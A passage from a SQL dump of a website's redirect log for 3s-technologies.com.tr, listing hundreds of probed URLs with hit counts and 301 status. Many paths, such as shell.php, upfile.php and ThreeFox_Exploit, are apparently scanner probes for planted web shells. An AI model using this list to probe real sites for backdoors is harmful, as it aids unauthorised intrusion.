00:00:00',301),(38914,'http://www.3s-technologies.com.tr/tr/blog/index.php',NULL,'http://www.3s-technologies.com.tr//blog/index.php','',1,0,'2025-03-25 11:17:20','0000-00-00 00:00:00',301),(38915,'http://www.3s-technologies.com.tr/tr/autoload_classmap.php',NULL,'http://www.3s-technologies.com.tr//autoload_classmap.php','',16,0,'2025-03-25 11:17:21','0000-00-00 00:00:00',301),(38916,'http://www.3s-technologies.com.tr/tr/xml.php',NULL,'http://www.3s-technologies.com.tr//xml.php','',2,0,'2025-03-25 11:17:22','0000-00-00 00:00:00',301),(38917,'http://www.3s-technologies.com.tr/tr/jindex.php',NULL,'http://www.3s-technologies.com.tr//jindex.php','',1,0,'2025-03-25 11:17:25','0000-00-00 00:00:00',301),(38918,'http://www.3s-technologies.com.tr/tr/.well-known/index.php',NULL,'http://www.3s-technologies.com.tr//.well-known/index.php','',8,0,'2025-03-25 11:17:26','0000-00-00 00:00:00',301),(38919,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/index.php',NULL,'http://www.3s-technologies.com.tr//wp-content/uploads/index.php','',11,0,'2025-03-25 11:17:28','0000-00-00 00:00:00',301),(38920,'http://www.3s-technologies.com.tr/tr/ini.php',NULL,'http://www.3s-technologies.com.tr//ini.php','',3,0,'2025-03-25 11:17:34','0000-00-00 00:00:00',301),(38921,'http://www.3s-technologies.com.tr/tr/themes.php',NULL,'http://www.3s-technologies.com.tr//themes.php','',13,0,'2025-03-25 11:17:36','0000-00-00 00:00:00',301),(38922,'http://www.3s-technologies.com.tr/tr/install.php',NULL,'http://www.3s-technologies.com.tr//install.php','',16,0,'2025-03-25 11:17:40','0000-00-00 00:00:00',301),(38923,'http://www.3s-technologies.com.tr/tr/wp-includes/css/index.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/css/index.php','',7,0,'2025-03-25 11:17:43','0000-00-00 00:00:00',301),(38924,'http://www.3s-technologies.com.tr/tr/.well-known/pki-validation/moon.php',NULL,'http://www.3s-technologies.com.tr//.well-known/pki-validation/moon.php','',1,0,'2025-03-25 11:17:45','0000-00-00 00:00:00',301),(38925,'http://www.3s-technologies.com.tr/tr/classwithtostring.php',NULL,'http://www.3s-technologies.com.tr//classwithtostring.php','',23,0,'2025-03-25 11:17:47','0000-00-00 00:00:00',301),(38926,'http://www.3s-technologies.com.tr/tr/goods.php',NULL,'http://www.3s-technologies.com.tr//goods.php','',8,0,'2025-03-25 11:17:52','0000-00-00 00:00:00',301),(38927,'http://www.3s-technologies.com.tr/tr/wp-links.php',NULL,'http://www.3s-technologies.com.tr//wp-links.php','',1,0,'2025-03-25 11:17:54','0000-00-00 00:00:00',301),(38928,'http://www.3s-technologies.com.tr/tr/wp-content/languages/wp-login.php',NULL,'http://www.3s-technologies.com.tr//wp-content/languages/wp-login.php','',1,0,'2025-03-25 11:18:00','0000-00-00 00:00:00',301),(38929,'http://www.3s-technologies.com.tr/tr/elp.php',NULL,'http://www.3s-technologies.com.tr//elp.php','',14,0,'2025-03-25 11:18:04','0000-00-00 00:00:00',301),(38930,'http://www.3s-technologies.com.tr/tr/wp-includes/product.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/product.php','',1,0,'2025-03-25 11:18:09','0000-00-00 00:00:00',301),(38931,'http://www.3s-technologies.com.tr/tr/wp-content/admin.php',NULL,'http://www.3s-technologies.com.tr//wp-content/admin.php','',21,0,'2025-03-25 11:18:11','0000-00-00 00:00:00',301),(38932,'http://www.3s-technologies.com.tr/tr/wp-admin/images/about.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/images/about.php','',1,0,'2025-03-25 11:18:15','0000-00-00 00:00:00',301),(38933,'http://www.3s-technologies.com.tr/tr/log.php',NULL,'http://www.3s-technologies.com.tr//log.php','',9,0,'2025-03-25 11:18:17','0000-00-00 00:00:00',301),(38934,'http://www.3s-technologies.com.tr/tr/inc.php',NULL,'http://www.3s-technologies.com.tr//inc.php','',4,0,'2025-03-25 11:18:20','0000-00-00 00:00:00',301),(38935,'http://www.3s-technologies.com.tr/tr/wp-admin/css/index.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/css/index.php','',3,0,'2025-03-25 11:18:22','0000-00-00 00:00:00',301),(38936,'http://www.3s-technologies.com.tr/tr/wp-conflg.php',NULL,'http://www.3s-technologies.com.tr//wp-conflg.php','',3,0,'2025-03-25 11:18:25','0000-00-00 00:00:00',301),(38937,'http://www.3s-technologies.com.tr/tr/cong.php',NULL,'http://www.3s-technologies.com.tr//cong.php','',15,0,'2025-03-25 11:18:27','0000-00-00 00:00:00',301),(38938,'http://www.3s-technologies.com.tr/tr/content.php',NULL,'http://www.3s-technologies.com.tr//content.php','',10,0,'2025-03-25 11:18:29','0000-00-00 00:00:00',301),(38939,'http://www.3s-technologies.com.tr/tr/wp-content/themes/seotheme/mar.php',NULL,'http://www.3s-technologies.com.tr//wp-content/themes/seotheme/mar.php','',7,0,'2025-03-25 11:18:32','0000-00-00 00:00:00',301),(38940,'http://www.3s-technologies.com.tr/tr/wp-content/languages/index.php',NULL,'http://www.3s-technologies.com.tr//wp-content/languages/index.php','',5,0,'2025-03-25 11:18:36','0000-00-00 00:00:00',301),(38941,'http://www.3s-technologies.com.tr/tr/edit.php',NULL,'http://www.3s-technologies.com.tr//edit.php','',17,0,'2025-03-25 11:18:38','0000-00-00 00:00:00',301),(38942,'http://www.3s-technologies.com.tr/tr/wp-mail.php',NULL,'http://www.3s-technologies.com.tr//wp-mail.php','',3,0,'2025-03-25 11:18:40','0000-00-00 00:00:00',301),(38943,'http://www.3s-technologies.com.tr/tr/wp-includes/simplepie/index.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/SimplePie/index.php','',1,0,'2025-03-25 11:18:44','0000-00-00 00:00:00',301),(38944,'http://www.3s-technologies.com.tr/tr/login.php',NULL,'http://www.3s-technologies.com.tr//login.php','',2,0,'2025-03-25 11:18:45','0000-00-00 00:00:00',301),(38945,'http://www.3s-technologies.com.tr/tr/text.php',NULL,'http://www.3s-technologies.com.tr//text.php','',2,0,'2025-03-25 11:18:46','0000-00-00 00:00:00',301),(38946,'http://www.3s-technologies.com.tr/tr/wp-includes/assets/index.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/assets/index.php','',15,0,'2025-03-25 11:18:47','0000-00-00 00:00:00',301),(38947,'http://www.3s-technologies.com.tr/tr/wp-includes/js/index.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/js/index.php','',1,0,'2025-03-25 11:18:50','0000-00-00 00:00:00',301),(38948,'http://www.3s-technologies.com.tr/tr/dropdown.php',NULL,'http://www.3s-technologies.com.tr//dropdown.php','',8,0,'2025-03-25 11:18:53','0000-00-00 00:00:00',301),(38949,'http://www.3s-technologies.com.tr/tr/.well-known/pki-validation/index.php',NULL,'http://www.3s-technologies.com.tr//.well-known/pki-validation/index.php','',1,0,'2025-03-25 11:18:57','0000-00-00 00:00:00',301),(38950,'http://www.3s-technologies.com.tr/tr/radio.php',NULL,'http://www.3s-technologies.com.tr//radio.php','',19,0,'2025-03-25 11:19:03','0000-00-00 00:00:00',301),(38951,'http://www.3s-technologies.com.tr/tr/wp-includes/customize/index.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/customize/index.php','',5,0,'2025-03-25 11:19:05','0000-00-00 00:00:00',301),(38952,'http://www.3s-technologies.com.tr/tr/css.php',NULL,'http://www.3s-technologies.com.tr//css.php','',23,0,'2025-03-25 11:19:06','0000-00-00 00:00:00',301),(38953,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/hello.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/hello.php','',1,0,'2025-03-25 11:19:08','0000-00-00 00:00:00',301),(38954,'http://www.3s-technologies.com.tr/tr/function.php',NULL,'http://www.3s-technologies.com.tr//function.php','',3,0,'2025-03-25 11:19:10','0000-00-00 00:00:00',301),(38955,'http://www.3s-technologies.com.tr/tr/randkeyword.php',NULL,'http://www.3s-technologies.com.tr//randkeyword.php','',5,0,'2025-03-25 11:19:11','0000-00-00 00:00:00',301),(38956,'http://www.3s-technologies.com.tr/tr/wp-includes/fonts/index.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/fonts/index.php','',8,0,'2025-03-25 11:19:12','0000-00-00 00:00:00',301),(38957,'http://www.3s-technologies.com.tr/tr/plugin.php',NULL,'http://www.3s-technologies.com.tr//plugin.php','',4,0,'2025-03-25 11:19:14','0000-00-00 00:00:00',301),(38958,'http://www.3s-technologies.com.tr/tr/wp-includes/text/wp-login.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/Text/wp-login.php','',2,0,'2025-03-25 11:19:18','0000-00-00 00:00:00',301),(38959,'http://www.3s-technologies.com.tr/tr/link.php',NULL,'http://www.3s-technologies.com.tr//link.php','',4,0,'2025-03-25 11:19:20','0000-00-00 00:00:00',301),(38960,'http://www.3s-technologies.com.tr/tr/wp-includes/fonts/about.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/fonts/about.php','',2,0,'2025-03-25 11:19:27','0000-00-00 00:00:00',301),(38961,'http://www.3s-technologies.com.tr/tr/wp-includes/admin.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/admin.php','',4,0,'2025-03-25 11:19:30','0000-00-00 00:00:00',301),(38962,'http://www.3s-technologies.com.tr/tr/defaults.php',NULL,'http://www.3s-technologies.com.tr//defaults.php','',2,0,'2025-03-25 11:19:32','0000-00-00 00:00:00',301),(38963,'http://www.3s-technologies.com.tr/tr/user.php',NULL,'http://www.3s-technologies.com.tr//user.php','',9,0,'2025-03-25 11:19:34','0000-00-00 00:00:00',301),(38964,'http://www.3s-technologies.com.tr/tr/wp-config-sample.php',NULL,'http://www.3s-technologies.com.tr//wp-config-sample.php','',4,0,'2025-03-25 11:19:41','0000-00-00 00:00:00',301),(38965,'http://www.3s-technologies.com.tr/tr/wp-admin/css/colors/blue/index.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/css/colors/blue/index.php','',10,0,'2025-03-25 11:19:47','0000-00-00 00:00:00',301),(38966,'http://www.3s-technologies.com.tr/tr/wp-content/mah.php',NULL,'http://www.3s-technologies.com.tr//wp-content/mah.php','',2,0,'2025-03-25 11:19:49','0000-00-00 00:00:00',301),(38967,'http://www.3s-technologies.com.tr/tr/wp-includes/mah.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/mah.php','',1,0,'2025-03-25 11:20:09','0000-00-00 00:00:00',301),(38968,'http://www.3s-technologies.com.tr/tr/wp-content/shell.php',NULL,'http://www.3s-technologies.com.tr//wp-content/shell.php','',1,0,'2025-03-25 11:20:13','0000-00-00 00:00:00',301),(38969,'http://www.3s-technologies.com.tr/tr/wp-includes/rest-api/index.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/rest-api/index.php','',1,0,'2025-03-25 11:20:15','0000-00-00 00:00:00',301),(38970,'http://www.3s-technologies.com.tr/tr/menu.php',NULL,'http://www.3s-technologies.com.tr//menu.php','',10,0,'2025-03-25 11:20:20','0000-00-00 00:00:00',301),(38971,'http://www.3s-technologies.com.tr/tr/data.php',NULL,'http://www.3s-technologies.com.tr//data.php','',3,0,'2025-03-25 11:20:22','0000-00-00 00:00:00',301),(38972,'http://www.3s-technologies.com.tr/tr/lock.php',NULL,'http://www.3s-technologies.com.tr//lock.php','',7,0,'2025-03-25 11:20:23','0000-00-00 00:00:00',301),(38973,'http://www.3s-technologies.com.tr/tr/wp-header.php',NULL,'http://www.3s-technologies.com.tr//wp-header.php','',1,0,'2025-03-25 11:20:24','0000-00-00 00:00:00',301),(38974,'http://www.3s-technologies.com.tr/tr/mini.php',NULL,'http://www.3s-technologies.com.tr//mini.php','',12,0,'2025-03-25 11:20:26','0000-00-00 00:00:00',301),(38975,'http://www.3s-technologies.com.tr/tr/randkeyword.php7',NULL,'http://www.3s-technologies.com.tr//randkeyword.PhP7','',4,0,'2025-03-25 11:20:29','0000-00-00 00:00:00',301),(38976,'http://www.3s-technologies.com.tr/tr/hehehehe.php',NULL,'http://www.3s-technologies.com.tr//hehehehe.php','',2,0,'2025-03-25 11:20:33','0000-00-00 00:00:00',301),(38977,'http://www.3s-technologies.com.tr/tr/wp-includes/wp-login.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/wp-login.php','',1,0,'2025-03-25 11:20:35','0000-00-00 00:00:00',301),(38978,'http://www.3s-technologies.com.tr/tr/.well-known/acme-challenge/index.php',NULL,'http://www.3s-technologies.com.tr//.well-known/acme-challenge/index.php','',7,0,'2025-03-25 11:20:38','0000-00-00 00:00:00',301),(38979,'http://www.3s-technologies.com.tr/tr/wp-admin/css/colors/index.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/css/colors/index.php','',3,0,'2025-03-25 11:20:39','0000-00-00 00:00:00',301),(38980,'http://www.3s-technologies.com.tr/tr/web.php',NULL,'http://www.3s-technologies.com.tr//web.php','',2,0,'2025-03-25 11:20:40','0000-00-00 00:00:00',301),(38981,'http://www.3s-technologies.com.tr/tr/worksec.php',NULL,'http://www.3s-technologies.com.tr//worksec.php','',3,0,'2025-03-25 11:20:46','0000-00-00 00:00:00',301),(38982,'http://www.3s-technologies.com.tr/tr/ioxi002.php7',NULL,'http://www.3s-technologies.com.tr//ioxi002.PhP7','',1,0,'2025-03-25 11:20:49','0000-00-00 00:00:00',301),(38983,'http://www.3s-technologies.com.tr/tr/wp-admin/network/about.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/network/about.php','',2,0,'2025-03-25 11:20:51','0000-00-00 00:00:00',301),(38984,'http://www.3s-technologies.com.tr/tr/back.php',NULL,'http://www.3s-technologies.com.tr//back.php','',1,0,'2025-03-25 11:20:54','0000-00-00 00:00:00',301),(38985,'http://www.3s-technologies.com.tr/tr/.well-known/about.php',NULL,'http://www.3s-technologies.com.tr//.well-known/about.php','',1,0,'2025-03-25 11:20:56','0000-00-00 00:00:00',301),(38986,'http://www.3s-technologies.com.tr/tr/plugins.php',NULL,'http://www.3s-technologies.com.tr//plugins.php','',3,0,'2025-03-25 11:20:58','0000-00-00 00:00:00',301),(38987,'http://www.3s-technologies.com.tr/tr/wp-content/about.php',NULL,'http://www.3s-technologies.com.tr//wp-content/about.php','',2,0,'2025-03-25 11:21:00','0000-00-00 00:00:00',301),(38988,'http://www.3s-technologies.com.tr/tr/class.api.php',NULL,'http://www.3s-technologies.com.tr//class.api.php','',1,0,'2025-03-25 11:21:03','0000-00-00 00:00:00',301),(38989,'http://www.3s-technologies.com.tr/tr/baxa1.php',NULL,'http://www.3s-technologies.com.tr//baxa1.php','',1,0,'2025-03-25 11:21:04','0000-00-00 00:00:00',301),(38990,'http://www.3s-technologies.com.tr/tr/wp-includes/simplepie/about.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/SimplePie/about.php','',3,0,'2025-03-25 11:21:07','0000-00-00 00:00:00',301),(38991,'http://www.3s-technologies.com.tr/tr/wp-includes/sitemaps/about.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/sitemaps/about.php','',1,0,'2025-03-25 11:21:10','0000-00-00 00:00:00',301),(38992,'http://www.3s-technologies.com.tr/tr/.well-known/acme-challenge/about.php',NULL,'http://www.3s-technologies.com.tr//.well-known/acme-challenge/about.php','',6,0,'2025-03-25 11:21:12','0000-00-00 00:00:00',301),(38993,'http://www.3s-technologies.com.tr/tr/ova.php',NULL,'http://www.3s-technologies.com.tr//ova.php','',6,0,'2025-03-25 11:21:16','0000-00-00 00:00:00',301),(38994,'http://www.3s-technologies.com.tr/tr/wp-content/item.php',NULL,'http://www.3s-technologies.com.tr//wp-content/item.php','',1,0,'2025-03-25 11:21:18','0000-00-00 00:00:00',301),(38995,'http://www.3s-technologies.com.tr/tr/wp-content/classwithtostring.php',NULL,'http://www.3s-technologies.com.tr//wp-content/classwithtostring.php','',1,0,'2025-03-25 11:21:20','0000-00-00 00:00:00',301),(38996,'http://www.3s-technologies.com.tr/tr/wp-admin/css/about.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/css/about.php','',3,0,'2025-03-25 11:21:23','0000-00-00 00:00:00',301),(38997,'http://www.3s-technologies.com.tr/tr/home.php',NULL,'http://www.3s-technologies.com.tr//home.php','',1,0,'2025-03-25 11:21:29','0000-00-00 00:00:00',301),(38998,'http://www.3s-technologies.com.tr/tr/wp-includes/item.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/item.php','',1,0,'2025-03-25 11:21:31','0000-00-00 00:00:00',301),(38999,'http://www.3s-technologies.com.tr/tr/wp-admin/network/admin.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/network/admin.php','',4,0,'2025-03-25 11:21:33','0000-00-00 00:00:00',301),(39000,'http://www.3s-technologies.com.tr/tr/wp-content/cong.php',NULL,'http://www.3s-technologies.com.tr//wp-content/cong.php','',3,0,'2025-03-25 11:21:36','0000-00-00 00:00:00',301),(39001,'http://www.3s-technologies.com.tr/tr/wp-content/themes/digital-download/new.php',NULL,'http://www.3s-technologies.com.tr//wp-content/themes/digital-download/new.php','',1,0,'2025-03-25 11:21:37','0000-00-00 00:00:00',301),(39002,'http://www.3s-technologies.com.tr/tr/wp-admin/images/admin.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/images/admin.php','',2,0,'2025-03-25 11:21:40','0000-00-00 00:00:00',301),(39003,'http://www.3s-technologies.com.tr/tr/byp.php',NULL,'http://www.3s-technologies.com.tr//byp.php','',14,0,'2025-03-25 11:21:42','0000-00-00 00:00:00',301),(39004,'http://www.3s-technologies.com.tr/tr/wp-admin/css/colors/about.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/css/colors/about.php','',1,0,'2025-03-25 11:21:46','0000-00-00 00:00:00',301),(39005,'http://www.3s-technologies.com.tr/tr/wp-includes/customize/about.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/customize/about.php','',5,0,'2025-03-25 11:21:50','0000-00-00 00:00:00',301),(39006,'http://www.3s-technologies.com.tr/tr/wp-admin/wp-login.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/wp-login.php','',1,0,'2025-03-25 11:21:52','0000-00-00 00:00:00',301),(39007,'http://www.3s-technologies.com.tr/tr/.well-known/acme-challenge/upfile.php',NULL,'http://www.3s-technologies.com.tr//.well-known/acme-challenge/upfile.php','',1,0,'2025-03-25 11:21:54','0000-00-00 00:00:00',301),(39008,'http://www.3s-technologies.com.tr/tr/wp-content/themes/include.php',NULL,'http://www.3s-technologies.com.tr//wp-content/themes/include.php','',2,0,'2025-03-25 11:21:57','0000-00-00 00:00:00',301),(39009,'http://www.3s-technologies.com.tr/tr/wp-admin/classwithtostring.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/classwithtostring.php','',1,0,'2025-03-25 11:22:00','0000-00-00 00:00:00',301),(39010,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/wordpresscore/index.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/WordPressCore/index.php','',1,0,'2025-03-25 11:22:02','0000-00-00 00:00:00',301),(39011,'http://www.3s-technologies.com.tr/tr/ova-tools.php',NULL,'http://www.3s-technologies.com.tr//ova-tools.php','',1,0,'2025-03-25 11:22:03','0000-00-00 00:00:00',301),(39012,'http://www.3s-technologies.com.tr/tr/version.php',NULL,'http://www.3s-technologies.com.tr//version.php','',1,0,'2025-03-25 11:22:05','0000-00-00 00:00:00',301),(39013,'http://www.3s-technologies.com.tr/tr/lufix.php',NULL,'http://www.3s-technologies.com.tr//lufix.php','',3,0,'2025-03-25 11:22:07','0000-00-00 00:00:00',301),(39014,'http://www.3s-technologies.com.tr/tr/wp-includes/images/wp-login.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/images/wp-login.php','',7,0,'2025-03-25 11:22:10','0000-00-00 00:00:00',301),(39015,'http://www.3s-technologies.com.tr/tr/wp-includes/pomo/wp-login.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/pomo/wp-login.php','',1,0,'2025-03-25 11:22:12','0000-00-00 00:00:00',301),(39016,'http://www.3s-technologies.com.tr/tr/wp-admin/user/index.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/user/index.php','',6,0,'2025-03-25 11:22:15','0000-00-00 00:00:00',301),(39017,'http://www.3s-technologies.com.tr/tr/wp-content/themes.php',NULL,'http://www.3s-technologies.com.tr//wp-content/themes.php','',1,0,'2025-03-25 11:22:16','0000-00-00 00:00:00',301),(39018,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/about.php',NULL,'http://www.3s-technologies.com.tr//wp-content/uploads/about.php','',4,0,'2025-03-25 11:22:18','0000-00-00 00:00:00',301),(39019,'http://www.3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/index.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/css/colors/coffee/index.php','',3,0,'2025-03-25 11:22:21','0000-00-00 00:00:00',301),(39020,'http://www.3s-technologies.com.tr/tr/wp-includes/link.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/link.php','',1,0,'2025-03-25 11:22:24','0000-00-00 00:00:00',301),(39021,'http://www.3s-technologies.com.tr/tr/wp-add.php',NULL,'http://www.3s-technologies.com.tr//wp-add.php','',1,0,'2025-03-25 11:22:31','0000-00-00 00:00:00',301),(39022,'http://www.3s-technologies.com.tr/tr/wp-admin/about.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/about.php','',8,0,'2025-03-25 11:22:32','0000-00-00 00:00:00',301),(39023,'http://www.3s-technologies.com.tr/tr/templates/beez/jsstrings.php',NULL,'http://www.3s-technologies.com.tr//templates/beez/jsstrings.php','',1,0,'2025-03-25 11:22:35','0000-00-00 00:00:00',301),(39024,'http://www.3s-technologies.com.tr/tr/wp-signup.php',NULL,'http://www.3s-technologies.com.tr//wp-signup.php','',4,0,'2025-03-25 11:22:37','0000-00-00 00:00:00',301),(39025,'http://www.3s-technologies.com.tr/tr/xl2023.php',NULL,'http://www.3s-technologies.com.tr//xl2023.php','',3,0,'2025-03-25 11:22:39','0000-00-00 00:00:00',301),(39026,'http://www.3s-technologies.com.tr/tr/wp-l0gin.php',NULL,'http://www.3s-technologies.com.tr//wp-l0gin.php','',1,0,'2025-03-25 11:22:43','0000-00-00 00:00:00',301),(39027,'http://www.3s-technologies.com.tr/tr/wp-admin/dropdown.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/dropdown.php','',1,0,'2025-03-25 11:22:50','0000-00-00 00:00:00',301),(39028,'http://www.3s-technologies.com.tr/tr/assets/library.php',NULL,'http://www.3s-technologies.com.tr//assets/library.php','',1,0,'2025-03-25 11:22:52','0000-00-00 00:00:00',301),(39029,'http://www.3s-technologies.com.tr/tr/504.php',NULL,'http://www.3s-technologies.com.tr//504.php','',1,0,'2025-03-25 11:22:56','0000-00-00 00:00:00',301),(39030,'http://www.3s-technologies.com.tr/tr/wp-admin/css/network.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/css/network.php','',1,0,'2025-03-25 11:22:57','0000-00-00 00:00:00',301),(39031,'http://www.3s-technologies.com.tr/tr/wp-content/content.php',NULL,'http://www.3s-technologies.com.tr//wp-content/content.php','',1,0,'2025-03-25 11:23:02','0000-00-00 00:00:00',301),(39032,'http://www.3s-technologies.com.tr/tr/wp-admin/admin.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/admin.php','',1,0,'2025-03-25 11:23:03','0000-00-00 00:00:00',301),(39033,'http://www.3s-technologies.com.tr/tr/wp-content/json.php',NULL,'http://www.3s-technologies.com.tr//wp-content/json.php','',3,0,'2025-03-25 11:23:05','0000-00-00 00:00:00',301),(39034,'http://www.3s-technologies.com.tr/tr/wp-includes/id3/about.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/ID3/about.php','',7,0,'2025-03-25 11:23:08','0000-00-00 00:00:00',301),(39035,'http://www.3s-technologies.com.tr/tr/tiny.php',NULL,'http://www.3s-technologies.com.tr//tiny.php','',4,0,'2025-03-25 11:23:11','0000-00-00 00:00:00',301),(39036,'http://www.3s-technologies.com.tr/tr/jp.php',NULL,'http://www.3s-technologies.com.tr//jp.php','',15,0,'2025-03-25 11:23:13','0000-00-00 00:00:00',301),(39037,'http://www.3s-technologies.com.tr/tr/wp-includes/fonts/wp-login.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/fonts/wp-login.php','',1,0,'2025-03-25 11:23:15','0000-00-00 00:00:00',301),(39038,'http://www.3s-technologies.com.tr/tr/wp-admin/js/about.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/js/about.php','',3,0,'2025-03-25 11:23:17','0000-00-00 00:00:00',301),(39039,'http://www.3s-technologies.com.tr/tr/wp-admin/network/wp-login.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/network/wp-login.php','',1,0,'2025-03-25 11:23:18','0000-00-00 00:00:00',301),(39040,'http://www.3s-technologies.com.tr/tr/upgrade.php',NULL,'http://www.3s-technologies.com.tr//upgrade.php','',2,0,'2025-03-25 11:23:21','0000-00-00 00:00:00',301),(39041,'http://www.3s-technologies.com.tr/tr/wp-content/tmpls.php',NULL,'http://www.3s-technologies.com.tr//wp-content/tmpls.php','',1,0,'2025-03-25 11:23:23','0000-00-00 00:00:00',301),(39042,'http://www.3s-technologies.com.tr/tr/.well-known/pki-validation/about.php',NULL,'http://www.3s-technologies.com.tr//.well-known/pki-validation/about.php','',1,0,'2025-03-25 11:23:24','0000-00-00 00:00:00',301),(39043,'http://www.3s-technologies.com.tr/tr/editor.php',NULL,'http://www.3s-technologies.com.tr//editor.php','',1,0,'2025-03-25 11:23:26','0000-00-00 00:00:00',301),(39044,'http://www.3s-technologies.com.tr/tr/class.php',NULL,'http://www.3s-technologies.com.tr//class.php','',16,0,'2025-03-25 11:23:27','0000-00-00 00:00:00',301),(39045,'http://www.3s-technologies.com.tr/tr/vendor/bin/loader.php',NULL,'http://www.3s-technologies.com.tr//vendor/bin/loader.php','',1,0,'2025-03-25 11:23:28','0000-00-00 00:00:00',301),(39046,'http://www.3s-technologies.com.tr/tr/wp-includes/wp-includes_function.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/wp-includes_function.php','',1,0,'2025-03-25 11:23:32','0000-00-00 00:00:00',301),(39047,'http://www.3s-technologies.com.tr/tr/wp-content/themes/hideo/network.php',NULL,'http://www.3s-technologies.com.tr//wp-content/themes/hideo/network.php','',5,0,'2025-03-25 11:23:34','0000-00-00 00:00:00',301),(39048,'http://www.3s-technologies.com.tr/tr/wp-includes/text/about.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/Text/about.php','',1,0,'2025-03-25 11:23:42','0000-00-00 00:00:00',301),(39049,'http://www.3s-technologies.com.tr/tr/wp-includes/wp-class.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/wp-class.php','',2,0,'2025-03-25 11:23:44','0000-00-00 00:00:00',301),(39050,'http://www.3s-technologies.com.tr/tr/wp-admin/maint/upfile.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/maint/upfile.php','',1,0,'2025-03-25 11:23:47','0000-00-00 00:00:00',301),(39051,'http://www.3s-technologies.com.tr/tr/wp-includes/room.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/room.php','',1,0,'2025-03-25 11:23:48','0000-00-00 00:00:00',301),(39052,'http://www.3s-technologies.com.tr/tr/defaul.php',NULL,'http://www.3s-technologies.com.tr//defaul.php','',1,0,'2025-03-25 11:23:50','0000-00-00 00:00:00',301),(39053,'http://www.3s-technologies.com.tr/tr/wp-includes/rest-api/about.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/rest-api/about.php','',1,0,'2025-03-25 11:23:52','0000-00-00 00:00:00',301),(39054,'http://www.3s-technologies.com.tr/tr/repeater.php',NULL,'http://www.3s-technologies.com.tr//repeater.php','',1,0,'2025-03-25 11:23:55','0000-00-00 00:00:00',301),(39055,'http://www.3s-technologies.com.tr/tr/njima.php',NULL,'http://www.3s-technologies.com.tr//Njima.php','',1,0,'2025-03-25 11:23:57','0000-00-00 00:00:00',301),(39056,'http://www.3s-technologies.com.tr/tr/ticket/vendor/htmlawed/htmlawed/gel4y.php',NULL,'http://www.3s-technologies.com.tr//ticket/vendor/htmlawed/htmlawed/gel4y.php','',1,0,'2025-03-25 11:23:59','0000-00-00 00:00:00',301),(39057,'http://www.3s-technologies.com.tr/tr/wp-content/themes/seotheme/db.php?u',NULL,'http://www.3s-technologies.com.tr//wp-content/themes/seotheme/db.php?u','',1,0,'2025-03-25 11:24:01','0000-00-00 00:00:00',301),(39058,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/ubh/up.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/ubh/up.php','',1,0,'2025-03-25 11:24:02','0000-00-00 00:00:00',301),(39059,'http://www.3s-technologies.com.tr/tr/wp-content/themes/pridmag/db.php?u',NULL,'http://www.3s-technologies.com.tr//wp-content/themes/pridmag/db.php?u','',1,0,'2025-03-25 11:24:05','0000-00-00 00:00:00',301),(39060,'http://www.3s-technologies.com.tr/tr/wp-content/threefox_exploit/index.php?threefox',NULL,'http://www.3s-technologies.com.tr//wp-content/ThreeFox_Exploit/index.php?threefox','',1,0,'2025-03-25 11:24:09','0000-00-00 00:00:00',301),(39061,'http://www.3s-technologies.com.tr/tr/nexus.php',NULL,'http://www.3s-technologies.com.tr//Nexus.php','',1,0,'2025-03-25 11:24:16','0000-00-00 00:00:00',301),(39062,'http://www.3s-technologies.com.tr/tr/wp-admin/maint/wp-damin.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/maint/wp-damin.php','',1,0,'2025-03-25 11:24:20','0000-00-00 00:00:00',301),(39063,'http://www.3s-technologies.com.tr/tr/epinyins.php',NULL,'http://www.3s-technologies.com.tr//epinyins.php','',2,0,'2025-03-25 11:24:21','0000-00-00 